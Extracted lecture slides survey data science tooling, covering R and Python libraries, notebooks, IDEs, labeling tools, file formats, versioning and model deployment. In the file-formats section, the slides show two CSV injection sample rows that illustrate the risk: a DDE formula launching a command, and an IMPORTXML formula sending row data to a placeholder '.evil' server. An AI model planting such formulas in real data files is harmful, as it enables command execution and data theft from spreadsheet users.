Advanced Analytics in Business [D0S07a] Big Data Platforms & Technologies [D0S06a] Data Science Tools Overview
In-memory analytics Python and R Visualization The road to big data Notebooks and development environments Labeling File formats Packaging and versioning systems Model deployment
2 In-memory Analytics
3 https://mattturck.com/data2020/ 4 Many tools and vendors
For experimentation and model development: hyperparameter tuning, logging, autoML For visualization For labeling For data: Hadoop, Spark, streaming data, feature stores, cloud data warehouses, different storage formats For labeling For deployment: different environments, pipe lines For monitoring and maintenance
5 Heard about Hadoop? Spark? H2O?
Many vendors with their “big data and analytics” stack
Amazon “My data lake versus yours” Cloudera There’s always “roll your own” Datameer Open source, or walled garden? DataStax Support, features, speed of upgrades? Dell Oracle The situation has stabilized a bit (i.e. the IBM champions have settled), but does it matter? MapR Pentaho Databricks Microsoft Hortonworks EMC2 6 Two sides emerge
Infrastructure
Big Data Integration Architecture NoSQL and NewSQL Streaming AI and ML ops
7 Two sides emerge
Analytics
Data Science Machine Learning AI NLP But also still: BI and Visualization
8 There’s a difference
9 In-memory analytics
Your data set fits in memory The assumption of many tools SAS, SPSS, MatLAB R, Python, Julia Is this really a problem? Servers with 512GB of RAM have become relatively cheap Cheaper than a HDFS cluster (especially in today’s cloud environment) Implementation makes a difference (representation of data set in memory) If your task is unsupervised or supervised modeling, you can apply sampling Some algorithms can work in online / batch mode
10 Python and R
11 The big two
The “big two” in modern data science: Python and R Both have their advantages Others are interesting too (e.g. Julia), but still less adopted Vendors such as SAS and SPSS remain as well But bleeding-edge algorithms or techniques found in open-source first Not (really) due to the language itself The language is just an interface Thanks to their huge ecosystem: many packages for data science available “Python is the second best language for everything” Add-on packages/libraries, which typically aim to: Work with higher order arrays (tensors) and apply operations (typically with broadcasting support) Inspired by early array languages such as Ada, APL, FORTRAN, … This then typically forms the basis to provide support for data frames and “wrangling” them E.g. a 2-dimensional matrix where each column can have a different type, together with sort/filter/aggregation functions Which is then used to construct feature matrices to perform un/supervised learning on Using the predictive techniques we’ve seen earlier As well as some techniques to plot and visualize results
12 Analytics with R
Native concept of a “data frame”: a table in which each column contains measurements on one variable, and each row contains one case Unlike a matrix, the data you store in the columns of a data frame can be of various types I.e., one column might be a numeric variable, another might be a factor, and a third might be a character variable. All columns have to be the same length (contain the same number of data items, although some of those data items may be missing values)
Fun read: Is a Dataframe Just a Table?, Yifan Wu, 2019 13 Analytics with R
Hadley Wickham Chief Scientist at RStudio, and an Adjunct Professor of Statistics at the University of Auckland, Stanford University, and Rice University Data Science “tidyverse” ggplot2 for visualizing data
dplyr for manipulating data
tidyr for tidying data
stringr for working with strings
lubridate for working with date/times https://www.tidyverse.org/ Data Import readr for reading .csv and fwf files
readxl for reading .xls and .xlsx files
haven for SAS, SPSS, and Stata files (also: foreign package)
httr for talking to web APIs
rvest for scraping websites
xml2 for importing XML files 14 Modern R
Learning R today? Make sure to use “modern R” principles
tidyverse should be the first package you install
Especially thanks to dplyr , tidyr , stringr , and lubridate
dplyr implements a verb-based data manipulation language Works on normal data frames but can also work with database connections (already a simple way to solve the mid-to-big sized data issue) Verbs can be piped together, similar to a Unix pipe operator
flights %>% select(year, month, day) %>% arrange(desc(year)) %>% head
15 Modern R
delay <- flights %>% group_by(tailnum) %>% summarise(count = n(), dist = mean(distance, na.rm = TRUE), delay = mean(arr_delay, na.rm = TRUE))
delay %>% filter(count > 20, dist < 2000) %>% ggplot(aes(dist, delay)) + geom_point(aes(size = count), alpha = 1/2) + geom_smooth() + scale_size_area()
Also see: https://www.rstudio.com/resources/cheatsheets/
16 Modeling with R
Virtually any unsupervised or supervised algorithm is implemented in R as a package The caret package (short for Classification And REgression Training) is a set of functions that attempt to streamline the process for creating predictive models. The package contains tools for: Data splitting Pre-processing Feature selection Model tuning using resampling Variable importance estimation Caret depends on other packages to do the actual modeling, and wraps these to offer a unified interface You can just use the original package as well if you know what you want Still widely used
17 Modeling with R
require(caret) require(ggplot2) require(randomForest)
training <- read.csv("train.csv", na.strings=c("NA","")) test <- read.csv("test.csv", na.strings=c("NA",""))
# Invoke caret with random forest and 5-fold cross validation rf_model <- train(TARGET~., data=training, method="rf", trControl=trainControl(method="cv",number=5), ntree=500) # Other parameters can be passed here
print(rf_model)
## Random Forest ## ## 5889 samples ## 53 predictors ## 5 classes: 'A', 'B', 'C', 'D', 'E' ## ## Resampling: Cross-Validated (5 fold) ## ## Summary of sample sizes: 4711, 4712, 4710, 4711, 4712 ## ## Resampling results across tuning parameters: ## mtry Accuracy Kappa Accuracy SD Kappa SD ## 2 1 1 0.006 0.008 ## 27 1 1 0.005 0.006 ## 53 1 1 0.006 0.007 ## ## Accuracy was used to select the optimal model using the largest value. ## The final value used for the model was mtry = 27. 18 Modeling with R
print(rf_model$finalModel)
## Call: ## randomForest(x = x, y = y, mtry = param$mtry, proximity = TRUE, ## allowParallel = TRUE) ## Type of random forest: classification ## Number of trees: 500 ## No. of variables tried at each split: 27 ## ## OOB estimate of error rate: 0.88% ## ## Confusion matrix: ## A B C D E class.error ## A 1674 0 0 0 0 0.00000 ## B 11 1119 9 1 0 0.01842 ## C 0 11 1015 1 0 0.01168 ## D 0 2 10 952 1 0.01347 ## E 0 1 0 5 1077 0.00554
19 Modeling with R
The mlr package is an alternative to caret
R does not define a standardized interface for all its machine learning algorithms The mlr package provides infrastructure so that you can focus on your experiments The framework provides supervised methods like classification, regression and survival analysis along with their corresponding evaluation and optimization methods, as well as unsupervised methods like clustering The package is connected to the OpenML R package and its online platform, which aims at supporting collaborative machine learning online and allows to easily share datasets as well as machine learning tasks, algorithms and experiments in order to support reproducible research mlr3 : https://mlr3.mlr-org.com/
Newer, though gaining uptake
20 Modeling with R
library(mlr3) set.seed(1)
task_iris = TaskClassif$new(id = "iris", backend = iris, target = "Species")
learner = lrn("classif.rpart", cp = 0.01)
train_set = sample(task_iris$nrow, 0.8 * task_iris$nrow) test_set = setdiff(seq_len(task_iris$nrow), train_set)
# train the model learner$train(task_iris, row_ids = train_set)
# predict data prediction = learner$predict(task_iris, row_ids = test_set)
# calculate performance prediction$confusion
## truth ## response setosa versicolor virginica ## setosa 11 0 0 ## versicolor 0 12 1 ## virginica 0 0 6
measure = msr("classif.acc") prediction$score(measure)
## classif.acc ## 0.9666667 21 Modeling with R
The modelr package provides functions that help you create elegant pipelines when modelling
By Hadley Wickham Mainly for simple regression models
More information: http://r4ds.had.co.nz/
Modern R approach Starts simple – linear and visual models Good introduction
22 Visualizations with R
ggplot2 reigns supreme By Hadley Wickham Uses a “grammar of graphics” approach A grammar of graphics is a tool that enables us to concisely describe the components of a graphic An abstraction which makes thinking, reasoning and communicating graphics easier Such a grammar allows us to move beyond named graphics (e.g., the “scatterplot”) and gain insight into the deep structure that underlies statistical graphics Original idea: Wilkinson (2006) ggvis : based on ggplot2 and built on top of vega (a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs) Also declaratively describes data graphics Different render targets Interactivity: interact in browser, phone, …
23 Visualizations with R shiny : a web application framework for R
Construct interactive dashboards
24 Other packages worth noting
janitor : tools for cleaning data stringr : work with text
lubridate : work with times and dates
ROCR : make ROC and other curves (or verification , or pROC , or mltools )
MICE : handle missing data (or naniar )
ROSE : up/down sampling with SMOTE forecast : time series analysis (or prophet )
leaflet : make maps
igraph : social network analysis
esquisse : drag and drop ggplot2 plot builder (Tableau-style, https://dreamrs.github.io/esquisse/) assertr : assertions on data
25 Analytics with Python
Python itself is not a statistical / scientific language
SciPy is a Python-based ecosystem of open-source software for mathematics, science, and engineering
NumPy is the fundamental package for scientific computing with Python A powerful N-dimensional array object, sophisticated (broadcasting) functions, tools for integrating C/C++ and Fortran code, useful linear algebra, … “Let’s make Python’s arrays fast” pandas is an open source, BSD-licensed library providing high-performance, easy-to-use data structures and data analysis tools for the Python programming language Python’s “data frame”, uses NumPy matplotlib : comprehensive 2d plotting SciPy library: fundamental library for scientific computing
26 Analytics with Python
“ When operating on two arrays, NumPy compares their shapes element-wise. It starts with the trailing dimensions, and works its way forward. Two dimensions are compatible when they are equal, or one of them is 1. Arrays do not need to have the same number of dimensions, they’re lined up in a trailing fashion. When either of the dimensions compared is one, the other is used. In other words, dimensions with size 1 are stretched or “copied” to match the other.
– https://docs.scipy.org/doc/numpy/user/basics.broadcasting.html “
Image (3d array): 256 x 256 x 3 * Scale (1d array): (1) x (1) x 3 = Result (3d array): 256 x 256 x 3
A (4d array): 8 x 1 x 6 x 1 * B (3d array): (1) x 7 x 1 x 5 = Result (4d array): 8 x 7 x 6 x 5
Learning solid Numpy indexing and broadcasting is a superpower
27 Analytics with Python
import pandas as pd import numpy as np
df.sort_values(by='B')
A B C D 2013-01-03 -0.861849 -2.104569 -0.494929 1.071804 2013-01-04 0.721555 -0.706771 -1.039575 0.271860 2013-01-01 0.469112 -0.282863 -1.509059 -1.135632 2013-01-02 1.212112 -0.173215 0.119209 -1.044236 2013-01-06 -0.673690 0.113648 -1.478427 0.524988 2013-01-05 -0.424972 0.567020 0.276232 -1.087401
28 Analytics with Python
NumPy itself is clean and very well documented…
Pandas’ API is a bit of a mess
“Minimally Sufficient Pandas”: https://medium.com/dunder-data/minimally-sufficient-pandas-a8e67f2a2428
E.g. on the different ways to index: .loc is primarily label based ( dataframe.loc['a'] ), but may also be used with a boolean array
.loc will raise KeyError when the items are not found
.iloc is primarily integer position based (from 0 to length-1 of the axis)
.ix supports mixed integer and label based access
Similarly to .loc , .at provides label based scalar lookups, while, .iat provides integer based lookups analogously to .iloc
Oh, and you can still do dataframe.a or dataframe['a']
If df is a sufficiently long DataFrame, then df[1:2] gives the second row, however, df[1] gives an error and df[[1]] gives the second column
There are packages like dplython and pandas-ply , though not widely used Pandas does have strong time-series operators, however Situation is a bit better since https://pandas.pydata.org/docs/whatsnew/v1.0.0.html 29 Modeling with Python
Modeling offers a better picture
scikit-learn Simple and efficient tools for data mining and data analysis Accessible to everybody, and reusable in various contexts Built on NumPy, SciPy, and matplotlib Open source, commercially usable - BSD license Lots of algorithms implemented Relatively easy to implement your own algorithms statsmodels Python library that provides classes and functions for the estimation of many different statistical models, as well as for conducting statistical tests, and statistical data exploration
30 Modeling with Python
from sklearn.datasets import load_iris from sklearn.ensemble import RandomForestClassifier import pandas as pd import numpy as np
iris = load_iris() df = pd.DataFrame(iris.data, columns=iris.feature_names) df['is_train'] = np.random.uniform(0, 1, len(df)) <= .75 df['species'] = pd.Factor(iris.target, iris.target_names)
train, test = df[df['is_train'] == True], df[df['is_train'] == False]
features = df.columns[:4] clf = RandomForestClassifier(n_jobs=2) y, _ = pd.factorize(train['species']) clf.fit(train[features], y)
preds = iris.target_names[clf.predict(test[features])] pd.crosstab(test['species'], preds, rownames=['actual'], colnames=['preds'])
31 Modeling with Python
For some things you’ll have to look elsewhere
scikit-learn tries to provide a unified API for the basic tasks in machine learning, with “ “ pipelines and meta-algorithms like grid search to tie everything together
pystruct handles general structured learning
seqlearn handles sequence based learning
surprise or lightfm for recommender engines
statsmodels or prophet for time series
“ Deep learning and reinforcement learning both require a rich vocabulary to define an architecture, with deep learning additionally requiring GPUs for efficient computing. However,
neither of these fit within the design constraints of scikit-learn “
Basic CPU-based artificial neural networks are present, however Some support to work with textual data though – i.e. many featurization options 32 Visualizations with Python
matplotlib : the foundation seaborn : “if matplotlib ‘tries to make easy things easy and hard things possible,’ seaborn tries to make a well-defined set of hard things easy too” ggplot : Python implementation of ggplot2. Not a “feature-for- feature port of ggplot2,” but there’s strong feature overlap Altair : newer library with “pleasant API”
bokey : similar
yellowbrick Datashader : for massive amounts of data points
Older but fun comparison at: https://dansaber.wordpress.com/2016/10/02/a- dramatic-tour-through-pythons-data-visualization-landscape-including- ggplot-and-altair/
33 Other packages worth noting
imbalanced-learn : up/down sampling with SMOTE and friends
plotnine : another ggplot -style Python plotting tool
tqdm : human friendly progress bars missingno : handle missing data
dateparser : handling dates in various formats
pyflux : time series analysis (or prophet , or tsfresh )
great_expectations : assertions on data
folium : mapping library scikit.ml : multilabel techniques
pomegranate : probabilistic models
semisup-learn : semi-supervised models
And there are interops packages to work between R and Python as well (e.g. reticulate )
34 Visualization
35 Packaged software and BI
Apart from the libraries mentioned above, there’s also packaged (“business intelligence” software)
E.g. Tableau, Spotfire, PowerBI, Cognos, Qlikview, SAS Visual Analytics, … Just “use” the tool, no hastle of coding and debugging Ease-of-use Limited in functionality Custom design more difficult Has virtually nothing to do with modeling
36 Packaged software and BI
Niche visualization can require niche tools, though
Web analytics (Google, Adobe, SAS) E.g. process mining: (Disco and friends) Graph visualizations: Gephi, NodeXL, sigma.js, Cytoscape Mapping (Leaflet, Folium, kepler.gl, others)
37 Further libraries to be aware of
d3.js : Javascript-library which made famous the concept of “data-driven” documents D3 allows you to bind arbitrary data to a Document Object Model (DOM), and then apply data-driven transformations to the document For example, you can use D3 to generate an HTML table from an array of numbers. Or, use the same data to create an interactive SVG bar chart with smooth transitions and interaction Direct coupling between data and visualization: changing the data changes the visualisation See: https://github.com/mbostock/d3/wiki/Gallery, http://bl.ocks.org/, http://bl.ocks.org/mbostock and https://bost.ocks.org/mike/
Graphviz: diagram and graph visualizations (serves as the “engine” in many other tools)
Plotly: widely used charting library, with Plotly Dash (https://plot.ly/products/dash/) as a great dashboarding tool for Python (great shiny alternative)
38 The Road to Big Data
39 On-GPU analytics
GPU: graphical processing unit
Efficient for massive parallelizable operations (e.g. linear algebra, vector operations) Ecosystem mainly based on Python Hardware support mainly based on NVIDIA GPU’s with CUDA SDK
Training data can be very large (a million images, for instance), but not necessarily stored or handled in a distributed fashion
“Epoch“: one iteration of training. For small data sets: exposing a learning algorithm to the entire set of training data (the “batch”) “Minibatch” means that the gradient is calculated across a sample before updating weights Can be done in-memory Computation can be distributed, however: often involves distribution over multiple GPUs, though these are separate approaches than Hadoop and friends, e.g. Apache mxnet – and often comes with bottlenecks when used in a networked fashion (so “distributed” often happens by using multiple GPU’s in one machine)
40 On-disk analytics
Even if your data set exceeds the boundaries of memory, there might be an easier way other than big-data oriented setups: the “intermediate” step before going full “big data”
Learn how to use your package correctly (e.g. apply methods instead of slow for loops!) Use a database and SQL Use a better memory representation (e.g. data.table in R) Memory-mapped files (i.e. “disk-scratching”) ff or bigmemory in R (but not that fun)
disk.frame : https://github.com/xiaodaigh/disk.frame
Dask in Python, similar API as pandas
Pandas on Ray (https://ray.readthedocs.io/en/latest/pandas_on_ray.html) is also popular, powerful when combined with modin (https://github.com/modin-project/modin) (“Modin is a DataFrame designed for datasets from 1KB to 1TB+”) vaex (https://github.com/vaexio/vaex) (works with huge tabular data, process more than a billion rows/second)
Dato (Turi) used to have a great implementation, now open source as Sframe (https://github.com/turi-code/SFrame) and in https://github.com/apple/turicreate
41 On-disk analytics
import pandas as pd import dask.dataframe as dd df = pd.read_csv('2015-01-01.csv') df = dd.read_csv('2015-*-*.csv') df.groupby(df.user_id).value.mean() df.groupby(df.user_id).value.mean().compute()
import graphlab import graphlab.aggregate as agg sf = graphlab.SFrame.read_csv('2018-01-01.csv') sf.groupby(key_columns='user_id', operations={'avg': agg.MEAN('value')})
Careful with this, though. You can end up with Pandas, Dask and Spark code in one spaghetti bowl
Nevertheless, most organizations that jumped on the Spark and co. bandwagon would have been better off taking a good look at the above
It could have been solved with a bunch of servers and a (distributed) on-disk library Funny how most of these libraries have adopted the directed acyclic graph (DAG) computing approach initially “rediscovered” by Spark as a way to forego MapReduce, something we’ll talk about later
“Pandas is crashing because I’m trying to work with a 50GB data set” is not really an excuse
42 Notebooks and Development Environments
43 Notebooks
Scientific programing in data science is very much concerned with exploration, experimentation, making demos, collaborating, and sharing results
It is this need for experiments, explorations, and collaborations that is addressed by notebooks for scientific computing Notebooks are collaborative web-based environments for data exploration and visualization Similar to a “lab notebook”
The idea of computer notebooks has been around for a long time, starting with the early days of MatLAB and Mathematica in the mid-to-late-80s
Later: SageMath and IPython Today: Jupyter
44 Notebooks
45 Notebooks
The Sage Notebook was released on 24 February 2005 by William Stein
Professor of mathematics at the University of Washington Free and open source software (GNU License), with the initial goal of creating an “open source alternative to Magma, Maple, Mathematica, and MATLAB” Sage is based on Python and focuses on mathematical worksheets
The IPython console was started by Fernando Perez circa 2001
From a first attempt to replicate a Mathematica Notebook with 259 lines of code With the Sage Notebook being a reference, Perez had many collaborations with the Sage team
In 2015, the IPython Notebook project became the Jupyter project
The ability to go beyond Python and run several languages (“kernels”) in a notebook However, it is not possible to have multiple cells with multiple languages within the same notebook Impressive success and steady growth since 2011 46 Notebooks
47 Notebooks
Other alternatives:
Apache Zeppelin: similar in concept to Jupyter Apache Zeppelin is build on the JVM while Jupyter is built on Python Zeppelin offers the possibility to mix languages across cells Zeppelin is mainly oriented towards Spark Was originally implemented as they way forward by many Spark-based vendor stacks, though today, we see that Jupyter is the most popular environment, so that most stacks are, or have continued to, including Jupyter Beaker: designed from the start to be a fully polyglot notebook. Supports Python, Python3, R, Julia, JavaScript, SQL, Java, Clojure, HTML5, Node.js, C++, LaTeX, Ruby, Scala, Groovy, Kdb Nice idea of mixing languages in the same notebook, but has not really gone anywhere nteract: for those of you that like to have Jupyter installed as a desktop app Includes easier ways for styling observablehq.com The cool new kid on the block Heavily JS oriented See e.g. https://observablehq.com/@bmesuere
48 Notebooks
Jupyter comes with a lot of benefits
Quick iteration, immediate output shown in the notebook Easy to construct “dynamic” reports, by applying your style sheets You can even make them interactive (i.e. through the use of widgets, https://ipywidgets.readthedocs.io/en/latest/examples/Widget%20Basics.html) Many extensions to adjust your workflow “Jupyter Hub” to host a multi user Jupyter environment
E.g. Netflix uses papermill to directly execute and schedule Notebooks
papermill is a tool for parameterizing, executing, and analyzing Jupyter Notebooks https://medium.com/netflix-techblog/scheduling-notebooks-348e6c14cfd6 https://github.com/nteract/papermill
49 Notebooks
But come with a set of issues as well…
Version control can be problematic Jupyter stores notebooks as one big JSON file, including inputs and outputs Every time you make a change, need to commit the whole file Code can only be run block-by-block (cell by cell) Can easily mess up flow of code (non-linear execution) You end up with a notebook, which has newer results above the older results Code can end up looking fragmented People start splitting the chunks and forget to put them back together, lose track of the order of the analysis and it all ends up in a big mess Does not encourage to write modular code You end up copying code fragments from older, other people’s notebooks “Executing” a notebook can be difficult Reproducibility? Export to Python, R?
50 Notebooks https://docs.google.com/presentation/d/1n2RlMdmv1p25Xy5thJUhkKGvjtV-dkAIsUXP-AL4ffI/edit and https://yihui.name/en/2018/09/notebook-war/:
1. Hidden state and out-of-order execution 2. Notebooks are difficult for beginners 3. Notebooks encourage bad habits 4. Notebooks discourage modularity and testing 5. Jupyter’s autocomplete, linting, and way of looking up the help are awkward 6. Notebooks encourage bad processes 7. Notebooks hinder reproducible + extensible science 8. Notebooks make it hard to copy and paste into Slack/Github issues 9. Errors will always halt execution 10. Notebooks make it easy to teach poorly 11. Notebooks make it hard to teach well
51 Notebooks
https://colab.research.google.com
52 Notebooks
https://studio.azureml.net/
53 Notebooks
All cloud providers have realized that the best data science environment to offer is simply Python + Jupyter + the possibility to install packages
The issues can be solved:
Version control can be problematic Fixed in many hosted environments Possible to “roll your own”, e.g. through the use of “git hooks” Code can only be run block-by-block (cell by cell) Enforce strict guidelines Does not encourage to write modular code E.g. see https://github.com/fastai/nbdev “Executing” a notebook can be difficult Solution exist to overcome this as well, e.g. papermill fast.ai has written a whole book using Jupyter
The takeaway? Notebooks are here to stay
Great tool for exploration, experimentation, development phase of data science, even for showing results in “report” form But additional processes / skills / governance required If not: “throw it over the wall projects” E.g. end-product of data scientist should be a (collection) of notebooks which can, at any moment, (re)train the model, save and validate it Common code should be put in separate modules “I like notebooks”
54 IDEs
Integrated development environment
Commonly offers much better debugging, code inspection, documentation capabilities RStudio for R On desktop Or hosted on web server (commercial) Support for Git and others Authoring reports, slide shows Interactive visualizations Spyder for Python Copies look and feel of Rstudio Similar: Rodeo Or IDEs such as PyCharm Or Jupyter Lab Builds on top of Jupyter Adds panel layout, file view
55 IDEs
https://www.rstudio.com/
56 IDEs
https://www.jetbrains.com/pycharm/
57 IDEs
https://github.com/jupyterlab/jupyterlab 58 IDEs
https://code.visualstudio.com/ 59 Getting started
Python
Anaconda Distribution: https://www.continuum.io/downloads Includes Jupyter, Python, data science package repository (also for R)
R
CRAN (base installation): https://cran.r-project.org/ RStudio: https://www.rstudio.com/ Or Jupyter
Hosted (“one click Jupyter”)
Google Colab: https://colab.research.google.com (free) Azure ML Studio: https://studio.azureml.net/ (free) Kaggle Kernels: https://www.kaggle.com/kernels (free) http://paperspace.io/ and https://gradient.paperspace.com/ https://www.floydhub.com/ https://www.crestle.com/ https://www.onepanel.io/ https://www.easyaiforum.cn/ (易学智能) SageMaker, or AWS Google Compute Platform, EC2, Digitalocean… and install yourself
60 Labeling
61 Labeling
Not so easy in real life…
62 Labeling
https://github.com/CrowdCurio/time-series-annotator 63 Labeling
https://github.com/SkalskiP/make-sense
64 Labeling
https://github.com/Labelbox/Labelbox 65 Labeling
https://github.com/NaturalIntelligence/imglab 66 Labeling
For different data types and tasks Manual labelers can be hired as well See https://github.com/heartexlabs/awesome-data-labeling for a good overview Good tools will utilize active learning approaches to speed up the labeling Label some images Train a model Next, ask to label some images for which the model is unsure Other approaches use a pretrained model to speed up the labeling
67 Labeling
https://github.com/koaning/human-learn 68 Labeling
“ Absolutely brilliant. Ever since taking ML classes in MSc and then again in PhD I have wondered why no machine learning approach ever applies such an obvious technique. And most real world datasets are probably adequately addressed with this approach, and everyone regardless of technical background can understand it. ML no longer has to be an inscrutable black box mystery.
As for the “let’s just draw the model” idea, it gets complicated as soon as you’re dealing with more than one input parameter. The author has some workarounds, it looks like.
Being able to project the data into a latent space where classes can be separated is what makes modern ML so valuable.
I don’t understand why this approach is valuable. If you can label your examples using traditional software, why would you build a model? Why not just use the label function in
whatever context you intended the model to exist? “ 69 Labeling
Snorkel Flow: https://snorkel.ai/platform/ Snorkel: https://github.com/snorkel-team/snorkel Snorkel: Rapid Training Data Creation with Weak Supervision: https://arxiv.org/abs/1711.10160
“ Humans provide accidental regularization - and a human made decision boundary can have further fine- tuning by an expert. Even better if you have a generative model which can “hallucinate” parts of the decision boundary which don’t have points. Now you can “probe” your model and have a human intervene if they think parts of the decision
boundary are wrong. “
70 Labeling
Also see:
FlyingSquid: https://github.com/HazyResearch/flyingsquid Alteryx Compose: https://github.com/alteryx/compose
71 File Formats
72 In which format do we store our data?
You might be used to text-based formats (CSV and friends, or Excel), but there are various concerns at play here:
How fast is it to serialize data (write)? How fast can it be read in? How large is it? Column or row based? Easy to distribute? Easy to modify schema?
73 Text based formats
CSV, TSV, JSON, XML Convenient to exchange with other applications or scripts Human readable Bulky and not efficient to query without reading whole structure in memory first Hard to infer schema Compression applies on file-level Still one of the most common formats
74 Text based formats
UserId,BillToDate,ProjectName,Description,DurationMinutes 1,2017-07-25,Test Project,Flipped the jibbet,60 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240 2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240
UserId,BillToDate,ProjectName,Description,DurationMinutes 1,2017-07-25,Test Project,Flipped the jibbet,60 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240 2,2017-07-25,Important Client, "=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")", 240 http://georgemauer.net/2017/10/07/csv-injection.html
75 Text based formats
76 Sequence files
A persistent data structure for binary key-value pairs “Serialized Java objects” Row-based Commonly used to transfer data in map-reduce jobs (see later) Compression applies on row level Less popular in recent years, not portable
77 Optimized Row Columnar (ORC)
Evolution of the older RCFile Stores collections of rows and within the collection the data is stored in columnar format (combination of row- and column-based) Lightweight indexing Splittable Less popular in recent years
78 Apache AVRO
Widely used as serialization format Row-based, compact binary format Schema is included in the file Supports schema evolution Add, rename and delete columns Compression on record level https://blog.cloudera.com/blog/2009/11/avro-a-new-format-for-data-interchange/
Column-oriented binary file format Efficient when specific columns are queried Common in data science Parquet is built to support very efficient compression and encoding schemes Parquet allows compression schemes to be specified on a per-column level Good support for schema evolution Can add columns at the end
80 SQLite files
Row-oriented file stores Support for multiple tables, schema evolution, SQL querying Integrates nicely with many languages Data sets can become very large
81 HDF5
HDF5 is a data model, library, and file format for storing and managing data Supports an unlimited variety of datatypes, and is designed for flexible and efficient I/O and for high volume and complex data HDF5 is portable and is extensible, allowing applications to evolve in their use of HDF5 A file system within a file Specification is very complex
82 Kudo
Kudu is a storage system for tables of structured data Tables have a well-defined schema consisting of a predefined number of typed columns. Each table has a primary key composed of one or more of its columns Kudu tables are composed of a series of logical subsets of data, similar to partitions in relational database systems, called Tablets Kudu provides data durability and protection against hardware failure by replicating these Tablets to multiple commodity hardware nodes
83 Apache Arrow
Engineers from across the Apache Hadoop community established Arrow as a de-facto standard for columnar in- memory processing and interchange The layout is highly cache-efficient in analytics workloads Not a binary file specification, but a memory representation specification Efficient and fast data interchange between systems without the serialization costs associated with other systems like Thrift, Avro, and Protocol Buffers A flexible structured data model supporting complex types that handles flat tables as well as real-world JSON-like data engineering workloads
84 Feather
A Fast On-Disk Format for Data Frames for R and Python, powered by Apache Arrow
“ “One thing that struck us was that while R’s data frames and Python’s pandas data frames utilize very different internal memory representations, they share a very similar semantic model”. In discussing Apache Arrow in the context of Python and R, we wanted to see if we could use the insights from feather to design a very fast file format for storing data frames that
could be used by both languages. “
Feather is a fast, lightweight, and easy-to-use binary file format for storing data frames
Lightweight, minimal API: make pushing data frames in and out of memory as simple as possible Language agnostic: Feather files are the same whether written by Python or R code. Other languages can read and write Feather files, too High read and write performance. When possible, Feather operations should be bound by local disk performance
85 Feather
library(feather) path <- "my_data.feather" write_feather(df, path) df <- read_feather(path) # Analogously, in Python, we have: import feather path = 'my_data.feather' feather.write_dataframe(df, path) df = feather.read_dataframe(path)
86 What to take away from this?
Be prepared to deal with different data sources
AVRO is fast to serialize (write, dump) data and supports schema evolution: great choice for ETL and integration Parquet and Feather are fast to read, query, and analyse data Feather currently a popular choice for data science
Future: Arrow/Feather + Parquet
Feather is not designed for long-term data storage. At this time, we do not guarantee that the file format will be stable between versions Instead, use Feather for quickly exchanging data between Python and R code, or for short-term storage of data frames as part of some analysis Feather is extremely fast. Since Feather does not currently use any compression internally, it works best when used with solid-state drives as come with most of today’s laptop computers Many organisations are adopting a hybrid approach
87 Packaging and Versioning Systems
88 Packaging
You’ll commonly encounter “package managers” when working in your preferred ecosystem
“ A package manager or package management system is a collection of software tools that automates the process of installing, upgrading, configuring, and removing computer programs
for a computer’s operating system in a consistent manner. “
Management of installs and updates Avoiding conflicts Resolving dependencies
89 Virtual environments
This is commonly combined with a way to set up “virtual environments”: isolated subsystems, each with their own collection packages
The idea is to make your environment reproducible Avoids the “runs on my computer” syndrome
90 In Python and R
R comes with each own package management system, allows to download packages from a repository E.g. install.packages(...)
Virtual environments can be set up using packrat
Python has had a lot of package managers, but the most common one nowadays is pip Included with Python 3 by default Included with the Anaconda distribution E.g. pip install numpy
Virtual environments can be set up using virtualenv
Or you can use conda : Anaconda’s package manager and virtual environment manager in-one Includes more than just Python packages, also R and other tools are included Hence also allows to set up clean isolated R workspaces Good rule of thumb: a new conda environment for each project https://conda.io/projects/conda/en/latest/user-guide/getting-started.html https://docs.conda.io/projects/conda/en/4.6.0/_downloads/52a95608c49671267e40c689e0bc00ca/conda-cheatsheet.pdf To isolate a complete environment, virtualization and containerization tools like docker are commonly used as well
91 Versioning systems
Something else to read up on is the use of version control systems
“ Version control systems are a category of software tools that help a software team manage changes to source code over time. Version control software keeps track of every modification to the code in a special kind of database. If a mistake is made, developers can turn back the clock and compare earlier versions of the code to help fix the mistake while minimizing
disruption to all team members. “
Even a good idea to use this for a “team of one” SVN, CSV, Mercurial, Bazaar Most common one is git
92 git
“ Git was created by Linus Torvalds in 2005 for development of the Linux kernel, with other kernel developers contributing to its initial development.
As with most other distributed version-control systems, and unlike most client–server systems, every Git directory on every computer is a full-fledged repository with complete history and full version-tracking abilities, independent of network access or a central server.
Git is free and open-source software distributed under the terms of the GNU General Public
License version 2. “
GitHub: hosts git repositories for you (free) GitLab: an alternative
93 git
GitHub Desktop
94 git
A good way to practice is to put your coding, data science projects, blog even on GitHub
E.g. feel free to try this for an assignment
Many data science recruiters will look at your GitHub profile to see the (personal) projects you’ve worked and collaborated on
95 Model Deployment
96 Context
Recall from the evaluation session that evaluation doesn’t stop at deployment
Sculley, D., Holt, G., Golovin, D., Davydov, E., Phillips, T., Ebner, D., … & Dennison, D. (2015). Hidden technical debt in machine learning systems. In Advances in neural information processing systems (pp. 2503-2511) In real-world machine learning systems, only a small fraction is comprised of actual ML code There is a vast array of surrounding infrastructure and processes to support their evolution Many sources of technical debt can accumulate in such systems, some of which are related to data dependencies, model complexity, reproducibility, testing, monitoring, and dealing with changes in the external world
97 Context
A simple straight-through process?
98 Common deployment issues
Lineage of data dependencies
Metadata management Ensuring that data is available to the model at prediction-time This include all pre-processing steps that are applied to the data! Different data sources, one-off data sources used during training Common deployment issues
Deployment context
Will the model be deployed as an API, embedded in a web app, a mobile app, scheduled to run every week, month…? Differences between data science development environment (Jupyter, Anaconda, R…) and I.T. environment (Java, .NET, …) How to keep model changes in sync with application changes?
100 Common deployment issues
Development governance
Is the training code well-documented? How is collaboration, versioning handled? Can the training code be easily reproduced, e.g. to re-train the model periodically? “Runs on my machine phenomenon”
101 Common deployment issues
Model governance
How is the model deployed? A common platform, using containerization or virtualization, ad-hoc? Is versioning support provided for models? Models as data: can output of one model be easily used in other models/projects? Is lineage kept? Is metadata available (e.g. when was the model last updated?)
102 Common deployment issues
Monitoring
Inputs, outputs, and usage! Do we know when the input data is changing, when the output probability changes? Are errors reported and logged?
103 Common deployment issues
Many of these issues are well known in traditional software engineering
Testing, monitoring, logging, structured development processes Continuous development, integration, deployment (CI/CD)
